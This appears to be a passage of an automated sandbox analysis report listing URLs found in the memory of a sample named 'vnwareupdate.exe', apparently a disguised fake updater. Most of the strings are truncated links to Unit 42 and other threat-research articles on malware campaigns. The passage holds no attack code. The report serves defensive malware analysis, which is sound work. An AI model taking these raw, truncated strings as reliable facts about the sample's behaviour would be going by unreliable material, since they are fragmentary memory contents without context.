Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/tracking-minidionis-cozycars-Tracking
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/unit-42-technical-analysis-se
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/unit-42-technical-analysis-seFlokibot
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/unit-42-technical-analysis-seRecent
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/unit-42-technical-analysis-seUnit
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-4ae4;APT10
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-Syrian
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-UPS:
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-WannaCry
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/watering-hole-attack-on-aeros
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/watering-hole-attack-on-aeros8
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/watering-hole-attack-on-aerosCompromised
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/07/watering-hole-attack-on-aerosWatering
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/08/banking-trojan-escelar-infect
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-8
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-KeyRaider:
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targetsOperation
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targetsRetefe
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/08/rtf-exploit-installs-italian-
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/08/rtf-exploit-installs-italian-A
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/08/rtf-exploit-installs-italian-RTF
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/08/rtf-exploit-installs-italian-Unusual
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/09/musical-chairs-multi-year-cam
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/09/musical-chairs-multi-year-camMusical
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modi
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/10/chinese-taomike-monetization-
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/10/chinese-taomike-monetization-Android
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/10/chinese-taomike-monetization-Chinese
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-a
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-aBanking
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-aDragonOK
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-aJapanese
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-aNetTraveler
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-aOperation
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-aYiSpecter:
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/11/bookworm-trojan-a-model-of-mo
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/11/cryptowall-v4-emerges-days-af
Source: vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/11/tdrop2-attacks-suggest-dark-s
Source: vnwareupdate.exe, 00000003.00000003.242880867.0000000003BE7000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-lin
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linAttack
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linAttacks
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russ
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russAPT3
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russBBSRAT
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russEl
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russPowerSniff
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russThe
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/12/ios-trojan-tinyv-attacks-jail
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2015/12/proxyback-malware-turns-user-
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/01/nettraveler-spear-phishing-em
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/01/nettraveler-spear-phishing-emNetTraveler
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/01/nettraveler-spear-phishing-emYiSpecter:
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-Anchor
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-Deep
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-New
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-Operation
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-The
Source: vnwareupdate.exe, 00000003.00000003.242214739.0000000005451000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espi
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-li
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-didAsruex:
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-didEmissary
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-didSphinx
Source: vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/02/locky-new-ransomware-mimics-d
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phish
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishAndroid
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishWidespread
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client
Source: vnwareupdate.exe, 00000003.00000003.233668995.0000000005DB3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/03/acedeceiver-first-ios-trojan-
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/03/banload-malware-affecting-bra
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/03/evolution-of-samsa-malware-su
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/03/locky-ransomware-installed-th
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/03/locky-ransomware-installed-thLocky
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/03/locky-ransomware-installed-thMalware
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-ma
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-maBBSRAT
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-maIlluminating
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/03/unit42-projectm-link-found-between-pakistani-acto
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/04/unit42-ransomware-locky-tesla
Source: vnwareupdate.exe, 00000003.00000003.242214739.0000000005451000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-o
Source: vnwareupdate.exe, 00000003.00000003.233614213.0000000005D73000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets
Source: vnwareupdate.exe, 00000003.00000003.233536403.0000000005CF3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/06/unit42-recent-mnkit-exploit-a
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/06/unit42-tracking-elirks-varian
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/06/unit42-tracking-elirks-varianTracking
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/07/unit42-andromeda-botnet-targe
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/07/unit42-cryptobit-another-rans
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/07/unit42-spynote-android-trojan
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/07/unit42-spynote-android-trojan(APT-C-23)
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/07/unit42-spynote-android-trojanKaseya
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/08/unit42-fresh-baked-homekit-ma
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unus
Source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusOrcus
Source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusPackrat:
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-t
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-tSigned
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-tSofacys
Source: vnwareupdate.exe, 00000003.00000003.236780975.00000000062F3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.233493320.0000000006353000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/10/unit42-psa-conference-invite-Operation
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-distt
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat
Source: vnwareupdate.exe, 00000003.00000003.236780975.00000000062F3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-tools
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolsDCSO
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolsDragonOK
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolsOperation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolsYiSpecter:
Source: vnwareupdate.exe, 00000003.00000003.241963093.0000000005611000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/01/unit42-exploring-cybercrime-u
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/01/unit42-exploring-cybercrime-uBanking
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/01/unit42-second-wave-shamoon-2-From
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/01/unit42-second-wave-shamoon-2-KONNI
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/01/unit42-second-wave-shamoon-2-Second
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-a
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-aInvestigation
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-aMagic
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-aSandworm
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/02/unit42-stegbaus-because-somet
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xage
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xage.
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xageFlokibot
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-si
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-siContinued
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/03/unit42-google-play-apps-infec
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-d
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequelThe
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequelWannaCry
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/?p=17203
Source: vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/?p=17203Aveo
Source: vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: http://researchcenter.paloaltonetworks.com/?p=17203Crimeware-as-a-Service
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://reversingminds-blog.logdown.com/posts/2125985-dridex-atombombing-in-detaiDown
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://sec4app.com
Source: vnwareupdate.exe, 00000003.00000003.244930410.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: http://seclists.org/fulldisclosure/2015/Jan/131
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://securelist.com/blog/68978/whos-really-spreading-through-the-bright-star/
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://securelist.com/blog/68978/whos-really-spreading-through-the-bright-star/Potential
